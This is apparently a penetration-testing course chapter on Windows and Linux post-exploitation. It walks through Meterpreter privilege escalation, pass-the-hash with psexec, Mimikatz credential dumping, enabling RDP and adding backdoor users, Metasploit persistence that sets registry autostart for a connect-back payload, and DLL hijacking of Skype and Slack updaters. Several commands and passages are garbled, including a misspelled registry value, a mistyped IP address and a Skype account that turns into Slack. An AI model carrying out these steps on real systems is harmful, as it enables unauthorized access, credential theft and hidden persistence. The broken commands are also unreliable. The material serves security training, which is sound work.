Privilege Escalation and Maintaining Access
6.2. Privilege Escalation and Maintaining Access
The first task is to perform Privilege Escalation and Maintaining Access.
Before actually seeing the attack methods and techniques that we can use in this phase, let's shine some light on what we mean with privilege escalation, what types of privilege escalation exist and what local exploits are (we introduced them in the previous module)
6.2.1. Privilege Escalation
Privilege Escalation is an attack that exploits OS or third-party software vulnerabilities (bugs, design flaws, etc.) in order to elevate the current access (privileges) to protected resources.
In other words, the attacker is able to gain unauthorized access to resources that (s)he is not supposed to access.
Types of Privilege Escalation:
Vertical The attacker is able to move from a lower-privileged user to a higher privileged user. For example from a low-end user to administration or root user.
Example: On a Linux OS, the attacker is able to escalate privileges from a user (i.e. applications) and gain root privileges
Horizontal The attacker keeps the same set or level of privileges, but assumes the identity of a different user (he/she does not gain any further privilege)
Example: On a Windows OS, the attacker is able to assume the identity on any other Standard User on the system. The attacker is not escalating privileges from a Standard User to an Administrator User.
Local Exploit
In the previous module, we explained client-side and remote exploits, but also introduced local exploits. Now let's see what these exploits are.
Different from the other two, local exploits require prior access on the target system. Their goal is to exploit operating systems or applications vulnerabilities in order to increase privileges on the target machine.
Now that we know more about privilege escalation and local exploit, let us go back to our pen-testing process. The purpose of this phase is to provide and secure access to the target machine with the highest privilege on the machine. In the next steps, we will assume to already have a shell or a meterpreter session on our target.
To get some basic information on the current meterpreter session, we can run sysinfo command. Let's run it and see what we get.
As you can see, we can read about the computer name (ELS), the current OS running on the exploited machine (Windows), its architecture (x64), domain name (workgroup), and also the architecture of the current meterpreter session process (x86/win32) meterpreter > sysinfo Computer : ELS OS : Windows 7 (Build 7601, Service Pack 1) Architecture : x64 (Current Process is WOW64) System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32
As you can imagine, there are many other commands and tools that we can use to get similar or more detailed information. For example, when dealing with a Windows machine we may want to run systeminfo, while on Linux machine we have plenty of commands to use: lsb_release, uname, lscpu, and more.
We will inspect these later on, once we get a stable and persistent connection to the exploited machine.
Once we know the type of machine we are dealing with, we can thinking about our maintaining access activities. In this phase we will make sure that our session is: - Stable (does not get dropped) - Privileged (can run with high privileges) - Persistent (through reboots)
6.2.1.1 Stable
One of the main issues when you get a meterpreter session on the target, is that the end user can kill the exploited process. It can happen, for example, when you exploit a client-side vulnerability through the web browser and the user just closes the web browser window.
To avoid losing the session on the target, one of the first tasks to perform is to migrate the session to another process.
Helpful commands Before seeing the migrate command, it is useful to know that giving help command in meterpreter, or simply typing ? and hitting enter, will list all commands and options.
Moreover, we have very useful meterpreter scripts that we can execute during this phase of our penetration test. We can list them by typing run and then pressing Tab twice.
Back to our goal of making our session stable. To let Metasploit automatically migrate to another process, you can use the following command (on Windows machine):
Example: ``` meterpreter > getpid Current pid: 2168 meterpreter > run post/windows/manage/migrate
As you can see, the meterpreter script automatically migrated to another process. It is important to know that the process on which it will migrate will always be a process with the same privileges as the current session and that the process name is notepad.txt.
If we want to see the list of all process running on the machine we can execute the ps command (even if it is a Windows machine)
Tip: Although the previous command works just fine, we can directly run migrate in the meterpreter session. This time however, we have to provide the process ID or the process name we want to migrate to.
6.2.1.2. Privilege Escalation
Once we have migrated our session, we can start our Post-Exploitation process. We will first want to make our access to the remote host persistent, in order to come back any time and have access to the machine.
However, most of the operations required to achieve a persistent access, also require our shell to run with the highest privileges.
Types of Privilege Escalation Based on its OS:
Windows Privilege Escalation The easiest and fastest way to get higher privileges is by running
getsystemwithin meterpreter. It will automatically find the best technique to elevate privileges.By default, the
getsystemtries all available techniques to escalate privileges. If a technique fails, it w ill try the next one until one of the available techniques works.If you want to run a specific technique, simply use the
-toption as follow:getsystem -t 1Important: Notice that depending on the current privileges on the machine, the
getsystemcommand may fail. For example, if you use this technique on systems with User Account Control (UAC) enabled (Windows Vista+), it would not work as well as systems like Windows XP.When UAC is enabled on the remote system,
bypassuacis one of the modules we can use to bypass it. First of all, we can verify if UAC is enabled by running the modulepost/windows/gather/win_privs.Linux Privilege Escalation Until now, we focus our privilege escalation activities on Windows OS. In the next slides, we will see how to achieve the same goals against Linux machines.
Once again, we suppose that we already exploited the target machine and that we already have a shell or a session on it.
Although Metasploit offers some privilege escalation modules for Linux OS, the best way to proceed is by getting information about the current OS and then searching for publicly available exploits.
Notice that privilege escalation exploits are very OS specific, so information about the OS and the applications installed on the machine may results in very useful information to narrow down your search.
Let's see an example of how we can escalate privileges on the following Linux machine. We already have a meterpreter session on it and we need to know more information about the OS running on it.
From the previous snapshot, we can see that we have access to a Linux Ubuntu 14.04.2 LTS (32bit) machine. Moreover we can see we are actually running under the user named
els.Our goal is to obtain highest privileges on the machine, which in this case means getting access as root. The most basic thing we can do is searching online for publicly available privilege escalation exploit.
If we check our OS with + the keyword
privilege escalation, there seems to be something available for our current system.Most of the time, you will find the source code of the exploit and you will have to compile it.
If the remote machine has everything you need you can compile the exploit directly on the target, otherwise you will have to compile it on your own machine. In the latter case, be aware to use the correct configuration and select the right architecture.
Compile on the target Let us suppose the target machine has everything we need, in other words,
gccis installed and we can compile the file. What we can do is upload the source file on the target, get a shell on it through meterpreter and then compile the exploit.Compile on Our Machine Supposing the target machine does not have
gcc, we cannot compile the exploit there and we have to do it locally.What we have seen so far are privilege escalation techniques that exploit some kind of vulnerability in OS implementations, but there are other different ways we can get higher privileges on the machine.
For example we may try to gather, dump or crack credentials related to administrators or root accounts.
Another way to escalate privileges can be achieved by exploring permissions on process running on the machine. If there are services or processes running with higher privileges, there may be the possibility to inject malicious code in one of them and then be able to run commands or write data on the system with their privileges.
Moreover, instead of injecting code directly in the application, you may also be able to escalate privileges by replacing files like DLLs or executables. This may happen if you have the right to write or edit files used by a service or process. You can replace these with your own version of the file and force the application to re-run and execute your code.
Think about a service that is running with system privileges and its executable is stored in a folder on which we have write permissions.
We can use
msfvenomto create your payload (or inject it with tools likeShellter,BDF, and so on). After that we can replace the file with the one just created and force the service to start (for example with DoS attacks).
6.2.1.3. Maintenance Access
So far we focused on how to escalate privileges on a compromised machine. Once we have higher privileges, we can move on to the next step: Maintaining Access
The purpose of this phase is to make our presence on the machine persistent - creating a backdoor readily available for later use.
We can use different techniques and tools to achieve this goal. Some are stealthier than others and some are only relevant to a particular OS.
We will study a few different methods to use during this phase, but remember that you can always improve and tweak them to your needs.
The following diagram summarizes the techniques we are going to use (see img-86):
As you probably noticed, some of the techniques (such as RDP or VNC) require services for the connection. Before we start exploring them, note that there are different situations that you can face. For example: - Services are already active and we need credentials to establish connection - No services are in place: we need to activate them - For new users, we need to add them for each service (if they are already active, otherwise we have to activate them)
Let us start with one of the easiest techniques: recovering the password hash
Password Hash We are assuming that we already have a meterpreter session on the target machine (Windows 8.1) and that the session is running with the highest privileges (
SYSTEM)
Now that we have password hashes we can move in two different directions. Let's see the first one:
Pass the Hash If we are not able to crack the hashes, we have to uses other techniques to ensure access on the target machine.
Pass the hash is a technique that allows us to connect to a remote machine, by the means of the hash without using the actual plain-text password. This technique can be used to connect back into the exploited machine, or to exploit other machines that share the same account credentials.
As you can imagine, if we are to gather administrator hashes, we can mount a pass the hash attack on all the machine in the network. This is dangerous since the same accounts (username and password_hash) can be used on multiple machines.
There are different tools and scripts freely available online that we can use to exploit this vulnerability. What we are going to use in the next slide is a Metasploit module called
psexec, that given a username and a password (or its hash), is able to execute an arbitrary payload.Let us see how to use the previous gathered hashes in order to obtain a shell on the remote system.
The Metasploit module we are going to use is stored at the following path:
Once selected, we will just need to set the password hash (
SMBPass) the username (SMBUser), the remote host IP address (RHOST) and then configure the payload options.Notice that the attack only works if we use an administrator account. Let's once again get the password hashes from the session that we already have on the password hashes from the session that we already have on the target machine and let's copy the username and password hash.
Our username will be
elswhile the password hash is:Now we can configure the
psexecmodule as follows and run the attack:If the attack works, we should be able to obtain a new meterpreter session:
Sometimes being in the local administrators group is not enough to pass-the-hash, and depending on the Windows OS system configuration and version, come changes may be required on the target system in order for this to work.
The issue typically presents itself when trying to pass-the-hash from an account which isn't an "actual" administrator (RID-500), but rather, from an account that is in the Administrators group.
For example, if we try the psexec module from a session where our current user is in the Administrator group, but not an "actual" Administrator, and we get a
STATUS_ACCESS_DENIED(Command=117 WordCount=0) error, this is a good indication that registry changes may be required on the target host in order for a successful pass-the-hash attack.msf exploit(psexec) > exploit [*] Started reverse TCP handler on 1912.168.102.147:4444 [*] Connecting to the server... [*] Authenticating to 192.168.102.155:445 as user 'els'... [-] Exploit failed [no-access]: Rex:Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)The two registry entries needed on the target for this to be successful are: -
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemAdd a new DWORD (32-bit) named LocalAccountTokenFilterPolicy and set its value to 1 -HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\ParametersAdd a new DWORD (32-bit) named RequireSecuritySignature and set its value to 0Nonetheless, if we already have a session on the target as an administrator, and would like to "modify" those registry settings to help us with the attack, we can do so with a couple simple powershell one-liners from a Powershell shell:
PS> Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFitlerPolicy -Value 1 -Type DWordPS> Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\LanManServer\Parameters -Name LocalAccountTokenFitlerPolicy -Value 1 -Type DWordThe previous registry changes, particularly the "LocalAccountTokenFilterPolicy" setting, essentially allow non RID-500 user accounts (users in the local administrator group for instance) to successfully pass-the-hash in some cases.
In addition to the traditional methods of pass-the-hash techniques, if we find ourselves in a situation where we have obtained an NTLM hash, and would like to use it to log onto a Remote Desktop service without the need to provide actual credentials, we can do that with RDP client available for Linux known as
xfreerdp, and comes preinstalled on Kali Linux.Crack the Hash Once we dump the hashes, we can try to crack them and obtain passwords that are used to login on active services running on your target machine.
Here we will not deal with password cracking, since it is covered more in depth in the System Security Section.
Mimikatz is a tool able to extract plaintext password, Kerberos tickets, perform pass-the-hash attacks and much more.
Although it is a stand-alone tool, Metasploit implements an extension that allows us to use its feature directly from the Meterpreter session.
We will briefly see it here in order to gather credentials and then we will inspect it more in detail later in this module.
In order to start using mimikatz and get the best out of it, it is important to have the current meterpreter session running on a 64-bit process. This allows it to successfully load all mimikatz features without any issues.
We have already seen how to check the current meterpreter architecture, but we will briefly recap it in the next section. We can verify this by running
sysinfo:meterpreter > sysinfo Computer : ELS OS : Windows 7 (Build 760, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_US Domain : WORKGROUP Logged On Users : 4 Meterpreter : x86/win32As we can see, we are currently running meterpreter on a 32 bits process
We have to migrate into a 64 bit process. Moreover, we need a process with the same privileges of the current session. Since we are currently running on
SYSTEMprivileges, we can list them with the following command: ``` meterpreter > ps -A x86_64 -s Filtering on arch... Filtering on SYSTEM processes...Now we have to select one of the process listed and run
migrate [PID]After that we will run on a 64-bits process and we will still have SYSTEM privileges on the machine.meterpreter > migrate 448 [*] Migrating from 1668 to 448... [*] Migration completed successfully. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : ELS OS : Windows 7 (Build 760, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_US Domain : WORKGROUP Logged On Users : 4 Meterpreter : x86/win32We can then load mimikatz and start using its feature to gather palintext credentials. The command are very simple: we first run
load mimikatzand then we print the help manual to list the new commands available:meterpreter > load mimikatz Loading extension mimikatz...success.``` Mimikatz Commands =================As you will see, you can run many different tasks and operations that will reveal very useful information.
We will not dig deeper into this tool, but as you can see from its help manual, it offers many options and commands to work with windows credentials, logon sessions, Kerberos, and so on.
We suggest you try it in a test environment in order to get familiar with it.
At this time we should have a set of working credentials. What we want to do now is to check if the RDP Service is active on the target, since we want to use it for backdoor access.
We already have a session on the remote machine and we can check enabled services by running the following command:
Note: Remember that you can open a Windows command prompt from a Meterpreter shell by running the following command:
shellHere is an example of what you can get with the
net startcommand:Now that we know if RDP is enabled or not, let's suppose it is disabled and enabled it. Once again we can do it directly from a Windows shell or via meterpreter scripts. The script we are going to use is called
getgui:As we can see from the previous output we can simply enable RDP with the
-eoption, but we can also add a new user and password with-pand-u:Here we can see we have successfully enabled RDP and we also set it automatically starts when the user logs in.
Enabling RDP on the machine is not all. If the target user (the one we know the credentials for) is not allowed to connect through RDP, we will have to grant him this privilege by adding him to the Remote Desktop Users group. Moreover we have to be sure that Windows firewall does not block the connections.
We assume that this group can log in to RDP, in other words that "Allow log on through Remote Desktop Services" Local policy is assigned to the Remote Users group. (See img-132) If the box is hardened this might not be the case.
From the Windows shell we can issue the command:
where
Remote Desktop Useris the name of the local group we want to add the user to andels_useris the username.If the command succeed we will get something like this:
The following snapshots show what happens before and after the command (see img-134)(Picture of victim's remote desktop users being added with us)
We can now check that everything works by trying to establish an RDP connection to the target machine:
Example:
Note: We can use the
netcommand to list groups and add users into them. Let's see first how to list all groups with thenet localgroupcommand:----------------------------------------------------------------------- *Administrators *Backup Operators *Cryptographic Operators *Distributed COM Users *Event Log Readers *Guests *IIS_IUSRS *Network Configuration Operators *Performance Log Users *Power Users *Remote Desktop UsersIf we want to list users within a specific group we just need to add the name of the group at the end of the previous command. For example let's list users in the RPD group: ``` net localgroup "Remote Desktop Users" Alias name Remote Desktop Users Comment Members in this group are granted the right to logon remotely
Now that we have the groups list, we could add the user to one of them. For example we can grant Standard Users with Administrator privileges, by simply adding them in the Administrator group. (see img-138)
Note that you can do the previous steps for all the groups listed before. For example, if you want a remote shell on the system, instead of RDP, you can make sure that Telnet service is enabled, and that your user is in the "TelnetClients" group. This way you can connect back again through Telnet with the same username and password.
Backdoor Our goal is to use Metasploit in order to generate an executable file (backdoor) that will persist through reboots of the victim machine.
Note that we are going to use connect-back backdoors, which means that it will be the victim machine that initiates the connection.
This way, we will avoid issues with dynamic IP addresses or firewalls in the middle.
The disadvantage is that the backdoor will always try a connection to the same IP address and port unless you use a host name obtained through some free DNS service like:
Note: this is the same technique that most malware use and ensures that you can change the binding on the DNS management panel to the point to your IP address.
The exploitation process works this way:
Upload the backdoor on the victim
Execute the file
At prefixed times (i.e. 5-6-10 seconds), it will try to connect back to our listener
Run it automatically at boot
Depending on the OS, this can be done by editing the Windows registry, services, schedules, rc.local, init.d
Thanks to Metasploit, the entire process can be completely automated. We do not have to worry about scripting the file, uploading it or editing the registers and services. What we have to do once we have the meterpreter session, is run one of the scripts we will see in the next sections and then, each time we want to connect back, start a listener on our machine.
Notice that the script only works against Windows machine.
Persistence Before running the script. let us see what options it offers. We can do this from the meterpreter session by running:
Example:
As we can see from the previous example, we can customize the script and choose where to upload the file, which payload to use, the interval between each connection attempt, how to start the backdoor and so on.
Let us see which options we will use in order to configure it correctly: -
-Astarts the handler on our machine --Xstart the agent at boot --i 5connection attempt each 5 seconds --p 8080the port for the connect back --r [IP_Address]our IP addressOnce we run it, the script output will look like this. As you can see the script automatically creates the backdoor, uploads it and sets the registry keys to start it at boot.
The steps in detail are as follows:
Creating the Payload
Uploading the backdoor file
Executing the backdoor
add the entry in the windows registry
Let's double check that the changes are real. Let's first get the registry value with the
regcommand and then list the files in the path where the backdoor has been uploaded:Once the process is complete, if we want to get a session on the target machine, we have to start the listener and wait for incoming connections. We can do it by using the
exploit/multi/handlermodule.Notice that we have to set the same options set with persistence: same payload, IP address, and local port.
In this way each time you need a meterpreter session on the target machine, we only need to start the handler and wait for the victim to connect back.
Since we edited the Windows Registry to start the script at the system boot, we will be able to create the session each time the machine is booted.
Upload the file into the victim machine:
Example:
Edit the Windows Registry Key with the reg command, in order to load your file at startup:
Example:
New Users An easy way to create a new user in the system is by running
net userandnet localgroupcommands.Once you create a new user for yourself, you have to join groups that allow you access to services such as RDP or Telnet and so on.
We have already seen this in the previous slides, so we will jump over these steps.
When a program is launched, the DLL Search Order in most cases is as follows:
The directory from which the application was launched
The
C:\Windows\System32directoryThe 16-bit Windows system directory (i.e,
C:\windows\system)The Windows directory (
C:\windows)The current directory at the time of execution
Any directories specified by the %PATH% environment variable
Skype, uses a proprietary update mechanism in order to deliver updates to the software, which runs when first installed, and then also runs periodically to check for updates.
When it does so, it launches a second binary (
Updater.exe) from within the "%ProgramFiles%\Skype\Updater" directory, which is launched as SYSTEM.This "
Updater.exe" component, when it finds an update for Skype, would copy or extract a new version of the binary to the "%systemroot%\Temp" directory as a file named "SKY<abcd>.tmp" which theUpdater.execomponent would then launch as a separate process.It was then found that the newly created
%systemroot%\Temp\SKY<abcd>.tmpexecutable, when launched by the Updater.exe component, would also look for a DLL in the same Temp directory called "UXTheme.dll", and attempt to import it.Since an attacker could write to the "
%systemroot%\Temp" directory, it was trivial to replace theUXTheme.dllwith a malicious copy and take control of the target as SYSTEM.Although this particular example didn't result in privilege escalation, rather it resulted in obtaining a reverse shell as the current user, and also offered a method of persistence every time the user would launch the "Check for Updates" command from within the Slack client or when the user would simply launch the Slack client.
When launching the Slack executable on Windows, it would search for a DLL called "DNSAPI.dll" from within the
%localappdata%\slackdirectory. Since we can write to, or modify files within this directory, it was trivial to replace the DNSAPI.dll with our own malicious copy.Our malicious DLL would then be executed whenever the user clicked on the "Check for Updates" option or when the application itself checked for updates periodically, and results in a meterpreter session. (see img-171)
Finding these instances of vulnerable applications can be done through either manual methods, or using scripts that can help us find these vulnerable applications and DLLs.
The process for manually identifying typical DLL Hijacking opportunities using Process Monitor (procmon) can be summarized as follows:
Create a procmon filter for a specific executable we'd like to investigate, (in this case "RegSrvc.exe"), and also, create a filter for "NAME NOT FOUND" for the Result column do we can quickly filter on relevant entries.
Identify cases where the application is looking for a DLL in a directory which we can write to, or modify.
Drop out modified payload in the writeable directory
Restart the Service, re-launch the application, or wait for the system to be rebooted in the case the executable is in fact associated with a service that starts at boot time, or alternatively, wait for the user to launch the affected application.
(see vids-181,182)
Last updated
Was this helpful?